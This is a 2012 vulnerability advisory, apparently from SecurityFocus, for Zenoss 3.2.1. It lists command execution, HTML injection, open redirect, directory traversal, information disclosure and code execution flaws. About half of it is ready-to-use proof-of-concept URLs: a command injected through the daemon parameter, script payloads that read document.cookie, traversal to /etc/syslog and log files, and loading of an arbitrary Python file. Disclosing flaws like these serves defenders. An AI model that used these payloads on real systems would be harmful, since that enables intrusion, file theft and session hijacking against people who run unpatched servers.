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Zenoss 3.2.1 - Multiple Vulnerabilities

🗓️ 30 Jul 2012 00:00:00Reported by Brendan ColesType 
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Zenoss 3.2.1 - Multiple Security Vulnerabilities, including arbitrary command-execution, HTML-injection, open-redirection, directory-traversal, information-disclosure, and code-executio

Code
source: https://www.securityfocus.com/bid/54793/info
 
Zenoss is prone to the following security vulnerabilities:
 
1. Multiple arbitrary command-execution vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. An open-redirection vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple information-disclosure vulnerabilities
6. A code-execution vulnerability
 
An attacker can exploit these issues to retrieve arbitrary files, redirect a user to a potentially malicious site, execute arbitrary commands, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials to perform unauthorized actions in the context of a user's session, or disclose sensitive-information.
 
Zenoss 3.2.1 and prior are vulnerable.

http://www.example.com/zport/About/showDaemonXMLConfig?daemon=uname%20-a%26
http://www.example.com/zport/dmd/Events/Users/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/Events/Users/eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/Events/Status/Snmp/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/ZenEventManager/listEventCommands?tableName=eventCommands&sortedHeader=primarySortKey&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/backupInfo?tableName=backupTable&sortedHeader=fileName&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script>
http://www.example.com/zport/acl_users/cookieAuthHelper/login?came_from=http%3a//example%2ecom/%3f
http://www.example.com/zport/About/viewDaemonLog?daemon=../../../var/log/mysqld
http://www.example.com/zport/About/viewDaemonConfig?daemon=../../../../etc/syslog
http://www.example.com/zport/About/editDaemonConfig?daemon=../../../../etc/syslog
http://www.example.com/zport/RenderServer/plugin?name=../../../../../../tmp/arbitrary-python-file
http://www.example.com/zport/dmd/ZenEventManager
http://www.example.com/manage

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